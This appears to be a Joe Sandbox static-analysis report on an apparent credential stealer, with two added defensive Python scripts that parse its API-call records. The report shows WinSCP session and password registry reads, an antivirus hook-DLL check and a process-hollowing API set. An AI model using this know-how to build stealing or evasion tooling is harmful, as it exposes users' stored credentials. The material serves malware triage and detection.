                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FF0F73
                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 00FF0F82
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF0FA0
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
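The entries in this report list each function's API calls as `Api.MODULE(stack slots), ref: <call-site address>` and name the memory dumps they were lifted from with a dotted `.sdmp` identifier. Two checks are worth doing mechanically when triaging many such entries: convert the `ref:` addresses into RVAs against the `Offset:` base so they can be looked up in IDA or a disassembled copy of the file, and decode the dump identifier so the protection of the region is visible at a glance (the first dump above decodes to an executable and writable image section, which is exactly what to confirm when a report flags a writable code section). The following is an added helper, not code from the Joe Sandbox report or from the analysed sample. It assumes the dump name is laid out as process index, stage, dump id, base address, page protection (Windows `PAGE_*` values), state, memory type (`MEM_IMAGE` etc.) and index; that field order is inferred from the entries on this page, not from Joe Sandbox documentation. It also assumes that the values printed on a `GetProcessHeap` line are the stack slots already pushed for the `HeapAlloc` that follows (`dwFlags`, `dwBytes`), which is how a compiler emits that idiom. The sample lines are copied from the first entry above.

```python
"""Decode Joe Sandbox function-entry metadata for triage.

Added example: not code from the Joe Sandbox report and not from the
analysed sample. Assumptions (labelled here and in comments): the .sdmp
name reads as
  <proc idx>.<stage>.<dump id>.<base addr>.<page protect>.<state>.<mem type>.<idx>
with the 5th field a Windows PAGE_* constant and the 7th a MEM_* type
constant (field order inferred from the report, not documented); and the
values shown on a GetProcessHeap line are the dwFlags/dwBytes slots already
pushed for the following HeapAlloc.
"""
import re
from dataclasses import dataclass

# Windows memory-protection and memory-type constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Host-fingerprinting APIs seen in the entries on this page plus common siblings.
FINGERPRINT_APIS = {
    "GetTimeZoneInformation", "GetUserNameA", "GetUserNameW", "GetSystemInfo",
    "GetComputerNameA", "GetComputerNameW", "GetVersionExA", "GetVersionExW",
}

H8 = r"([0-9A-Fa-f]{8})"
SDMP_RE = re.compile(
    rf"{H8}\.{H8}\.(\d+)\.([0-9A-Fa-f]{{16}})\.{H8}\.{H8}\.{H8}\.{H8}\.sdmp")
API_RE = re.compile(r"(\w+)\.(\w+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    dump_id: int
    base: int
    protection: int
    mem_type: int

    @property
    def protection_name(self) -> str:
        # Mask off modifier bits (PAGE_GUARD / PAGE_NOCACHE) before lookup.
        return PAGE_PROTECT.get(self.protection & 0xFF, f"0x{self.protection:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def executable(self) -> bool:
        return bool(self.protection & 0xF0)   # any PAGE_EXECUTE* variant

    @property
    def writable(self) -> bool:
        return bool(self.protection & 0xCC)   # READWRITE, WRITECOPY and their EXECUTE forms


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int            # virtual address of the call site in the dump

    def rva(self, image_base: int) -> int:
        """Offset relative to the module base given as 'Offset:' in the report."""
        return self.ref - image_base


def parse_sdmp(name: str) -> DumpRegion:
    m = SDMP_RE.search(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    return DumpRegion(process_index=int(m.group(1), 16), dump_id=int(m.group(3)),
                      base=int(m.group(4), 16), protection=int(m.group(5), 16),
                      mem_type=int(m.group(7), 16))


def parse_api_line(line: str) -> ApiCall:
    m = API_RE.search(line)
    if not m:
        raise ValueError(f"not an API line: {line}")
    args = tuple(a.strip() for a in m.group(3).split(",")) if m.group(3) else ()
    return ApiCall(api=m.group(1), module=m.group(2), args=args, ref=int(m.group(4), 16))


def _hex_or_none(token: str):
    try:
        return int(token, 16)
    except ValueError:          # '?' marks a slot the tracer could not resolve
        return None


def summarise_function(api_lines, image_base: int) -> dict:
    """Turn one entry's 'APIs' list into RVAs plus a fingerprinting verdict."""
    calls = [parse_api_line(l) for l in api_lines if "ref:" in l]
    heap_bytes = None
    for prev, cur in zip(calls, calls[1:]):
        # Assumption (see docstring): dwBytes is the 2nd slot printed on the
        # GetProcessHeap line that immediately precedes HeapAlloc.
        if cur.api == "HeapAlloc" and prev.api == "GetProcessHeap" and len(prev.args) >= 2:
            heap_bytes = _hex_or_none(prev.args[1])
    return {
        "rvas": {c.api: c.rva(image_base) for c in calls},
        "collects": sorted(c.api for c in calls if c.api in FINGERPRINT_APIS),
        "formats_string": any(c.api.startswith("wsprintf") for c in calls),
        "heap_bytes": heap_bytes,
    }


# Constructed sample input, copied from the first function entry on this page.
SAMPLE_SDMP = "00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp"
SAMPLE_APIS = [
    "• GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00FF0F6C",
    "• HeapAlloc.KERNEL32(00000000), ref: 00FF0F73",
    "• GetTimeZoneInformation.KERNEL32(?), ref: 00FF0F82",
    "• wsprintfA.USER32 ref: 00FF0FA0",
]
IMAGE_BASE = 0x00FE0000   # the 'Offset:' value on the Source File line

if __name__ == "__main__":
    r = parse_sdmp(SAMPLE_SDMP)
    print(f"{r.base:#x} {r.protection_name} {r.type_name} exec={r.executable} write={r.writable}")
    print(summarise_function(SAMPLE_APIS, IMAGE_BASE))
```

Run on the first entry, the region at 0xFE1000 comes back as `PAGE_EXECUTE_WRITECOPY` / `MEM_IMAGE`, the call into `GetTimeZoneInformation` lands at RVA 0x10F82, the buffer handed to `HeapAlloc` is 0x104 bytes, and the verdict is "collects a timezone value and formats it with `wsprintfA`", which is the host-fingerprint string a stealer sends alongside harvested credentials. The RVAs are what to feed to a disassembler; the `PAGE_*` name is what to compare against the section characteristics in the PE header.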
Similarity
• API ID: Heap$AllocInformationProcessTimeZonewsprintf
• String ID:
• API String ID: 362916592-0
• Opcode ID: 3e5c77eec5e209b18a80dc32c9e65d31b2c7b78482e0d1dad4e5410e5d6185cf
• Instruction ID: d8c2c93ad33962a7f43d015b30d0fd7be9d56a3610f3b2b0bad6855abd99ca0e
• Opcode Fuzzy Hash: 3e5c77eec5e209b18a80dc32c9e65d31b2c7b78482e0d1dad4e5410e5d6185cf
• Instruction Fuzzy Hash: 48F0B471A00318AFD720DBB4BC0DB6E37A9AF45325F540259F615D61C4DB74AE048B85
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE13A9), ref: 00FF0E82
• HeapAlloc.KERNEL32(00000000,?,?,?,00FE13A9), ref: 00FF0E89
• GetUserNameA.ADVAPI32(00000000,00FE13A9), ref: 00FF0E9D
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Heap$AllocNameProcessUser
• String ID:
• API String ID: 1206570057-0
• Opcode ID: a1430d2b62ca592493e192d88ec09e009f416056d4e3985f17bde723f6443813
• Instruction ID: 15e1cb920856834c795e18eaa45651311fc648a7eacf1620d1fafad7a444308a
• Opcode Fuzzy Hash: a1430d2b62ca592493e192d88ec09e009f416056d4e3985f17bde723f6443813
• Instruction Fuzzy Hash: 57D017B6200205BBD7219B95D80DE8A7AECEB84B25F004055BA86D2284DAF999489B20
APIs
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2452939696-0
                                                                                                                                                                                                                                                          • Opcode ID: e637e8aab801439de9bc44e71c31382fac72ef2389c198cbea4390031139136a
                                                                                                                                                                                                                                                          • Instruction ID: 6c0481986785c7e2717436e8e2b08dc759ad54590fa62cf2574ac2b65fcfdefc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e637e8aab801439de9bc44e71c31382fac72ef2389c198cbea4390031139136a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6E09270D1021C9BCF21DFA0ED599DD73FCAF04204F4045B5E605E3184D6B4AB889F80
APIs
• lstrcmpiW.KERNEL32(?,?,?,?,?,?,00FE14F3,avghookx.dll,00FF7FC6), ref: 00FE14CF
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcmpi
• String ID:
• API String ID: 1586166983-0
• Opcode ID: fdc7626d6448d267a570384b87506c32fee5f21072150372c4e276b5190a0f7f
• Instruction ID: d65366c1f267b4d629e48592304a1855867f5f29218f646683ae1c891203ec2d
• Opcode Fuzzy Hash: fdc7626d6448d267a570384b87506c32fee5f21072150372c4e276b5190a0f7f
• Instruction Fuzzy Hash: D4F05836A04154ABCF21CF5AD804AAAFBB8FB43760F256054E809B7240C330ED11EA98
Control-flow Graph (graph image omitted)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
• API String ID: 2238633743-2740034357
• Opcode ID: b73603037cb249450de0fea45d9dd8ce0feff7d65578589bc590beae7866a5f9
• Instruction ID: 5fd2c4269188aa9f43b826eb5a5c95a279d4a97063b252d29b856459a6ca5405
• Opcode Fuzzy Hash: b73603037cb249450de0fea45d9dd8ce0feff7d65578589bc590beae7866a5f9
• Instruction Fuzzy Hash: 3A52E979401216EFDBB25F65FA4D8663BB3F72C345381C426EB858226CEB724860EF50
Control-flow Graph (graph image omitted)
APIs
• _memset.LIBCMT ref: 00FEE36B
• _memset.LIBCMT ref: 00FEE38B
• _memset.LIBCMT ref: 00FEE39C
• _memset.LIBCMT ref: 00FEE3AD
• RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEE3E1
• RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 00FEE412
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEE42A
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEE451
• RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEE471
• RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 00FEE494
• RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,01015927), ref: 00FEE52D
• RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 00FEE58D
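Three of the function records above carry the behaviour the report's signature list summarises: the lstrcmpiW call that compares a module name against avghookx.dll (an AV hook DLL check), the GetProcAddress/LoadLibrary resolver whose String ID list contains CreateProcessA, GetThreadContext, VirtualAllocEx, WriteProcessMemory, SetThreadContext and ResumeThread (the API set needed for process hollowing), and the function that opens HKCU\Software\Martin Prikryl\WinSCP 2\Configuration, reads Security\UseMasterPassword, then enumerates the Sessions subkeys and reads HostName and PortNumber. The Python script below is an added triage example, not code from the Joe Sandbox report or from the sample: it parses call lines in the format the report prints, maps the root handle 80000001 to HKCU, and flags those three behaviours. The hive table, the six-API hollowing set and the single-entry hook DLL list are this script's own assumptions (a production rule would carry more entries); the sample records are copied from the function records above. The report prints arguments comma-separated and unquoted, so the parser splits on commas, which is only safe while no string argument contains one.

```python
import re
from dataclasses import dataclass

# Registry root handles as the report prints the first RegOpenKeyEx argument (assumption).
HIVES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU"}

# Key paths that hold saved credentials; only WinSCP is listed because only WinSCP
# appears in the record above (assumption: extend per tool you care about).
CREDENTIAL_KEYS = {
    r"software\martin prikryl\winscp 2\configuration": "WinSCP configuration",
    r"software\martin prikryl\winscp 2\sessions": "WinSCP saved sessions",
}

# Minimal API set for process hollowing: create suspended, allocate, write,
# patch the thread context, resume.  Chosen by this script, not by the report.
HOLLOWING_SET = frozenset({"CreateProcessA", "GetThreadContext", "VirtualAllocEx",
                           "WriteProcessMemory", "SetThreadContext", "ResumeThread"})

# Module names that only exist when an AV user-mode hook is loaded; only the one
# compared in the lstrcmpiW record above is listed (assumption).
HOOK_DLLS = frozenset({"avghookx.dll"})

# One report call line: "<api>.<module>(<args>), ref: <addr>" or "<api>.<module> ref: <addr>".
CALL_RE = re.compile(
    r"^(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple
    ref: str

def parse_call(line):
    """Parse one call line; return None for headers and other non-call text."""
    m = CALL_RE.match(line.strip())
    if not m:
        return None
    # '?' marks an argument the static pass could not resolve; arguments are unquoted,
    # so a string argument containing a comma would be split here (none in these records).
    raw = m.group("args")
    args = tuple(a.strip() for a in raw.split(",")) if raw is not None else ()
    return Call(m.group("api"), m.group("module"), args, m.group("ref"))

def parse_calls(text):
    return [c for c in map(parse_call, text.splitlines()) if c is not None]

def registry_findings(calls):
    """Credential-store keys opened and the values read afterwards, in call order."""
    out = []
    for c in calls:
        if c.api.startswith("RegOpenKeyEx") and len(c.args) >= 2:
            hive, label = HIVES.get(c.args[0]), CREDENTIAL_KEYS.get(c.args[1].lower())
            if hive and label:
                out.append({"kind": "credential_key", "hive": hive, "path": c.args[1],
                            "label": label, "ref": c.ref})
        elif c.api.startswith("RegGetValue") and len(c.args) >= 3:
            out.append({"kind": "value_read", "subkey": c.args[1], "value": c.args[2], "ref": c.ref})
    return out

def hook_dll_findings(calls):
    """lstrcmpi* calls whose operands name a known AV hook DLL (anti-analysis check)."""
    return [{"kind": "hook_dll_check", "dll": a.lower(), "ref": c.ref}
            for c in calls if c.api.startswith("lstrcmpi")
            for a in c.args if a.lower() in HOOK_DLLS]

def hollowing_coverage(string_id):
    """string_id is the report's '$'-joined String ID list of a GetProcAddress resolver."""
    names = {s.strip() for s in string_id.split("$") if s.strip()}
    present = HOLLOWING_SET & names
    return {"present": sorted(present), "missing": sorted(HOLLOWING_SET - names),
            "complete": present == HOLLOWING_SET}

# Sample records copied from the function records above.
WINSCP_RECORD = r"""
• _memset.LIBCMT ref: 00FEE36B
• _memset.LIBCMT ref: 00FEE38B
• _memset.LIBCMT ref: 00FEE39C
• _memset.LIBCMT ref: 00FEE3AD
• RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEE3E1
• RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 00FEE412
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEE42A
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEE451
• RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEE471
• RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 00FEE494
• RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,01015927), ref: 00FEE52D
• RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 00FEE58D
"""
HOOK_RECORD = "• lstrcmpiW.KERNEL32(?,?,?,?,?,?,00FE14F3,avghookx.dll,00FF7FC6), ref: 00FE14CF"
RESOLVER_STRING_ID = ("CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$"
                      "ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$"
                      "VirtualAllocEx$WriteProcessMemory$dbghelp.dll")

def triage(api_record, resolver_string_id):
    calls = parse_calls(api_record)
    return {"registry": registry_findings(calls), "hook_dll": hook_dll_findings(calls),
            "hollowing": hollowing_coverage(resolver_string_id)}

if __name__ == "__main__":
    import json
    print(json.dumps(triage(WINSCP_RECORD + HOOK_RECORD, RESOLVER_STRING_ID), indent=2))
```

On the WinSCP records the script reports both credential keys under HKCU and the three values read (UseMasterPassword, HostName, PortNumber), which is the order the calls appear in the record; the resolver's String ID list covers the full six-API hollowing set, and the lstrcmpiW record yields one hook DLL check. On a host with WinSCP installed, the defensive counterpart is to verify that UseMasterPassword is set, since the sample reads that value before touching the session list.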
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: _memset$Value$CloseOpen$Enum
• String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
• API String ID: 463713726-2798830873
• Opcode ID: efab34c028da9bd62b7f002fea08d1200eb7ac2272b34a67ebf746a089db3dae
• Instruction ID: bc17be707dd185169d7a3ce12d92d2c6006d42f7169f162d52ef4af80a6b35c4
• Opcode Fuzzy Hash: efab34c028da9bd62b7f002fea08d1200eb7ac2272b34a67ebf746a089db3dae
• Instruction Fuzzy Hash: D9D1C97291012DAADB20EB91DC41BEDB778AF04304F4144E7A608B7126DBB57F85DFA1

Control-flow Graph

APIs
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
  • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AD9
  • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4ADF
  • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AE5
  • Part of subcall function 00FE4AA7: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00FE4AF7
  • Part of subcall function 00FE4AA7: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00FE4AFF
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
• InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE5FCA
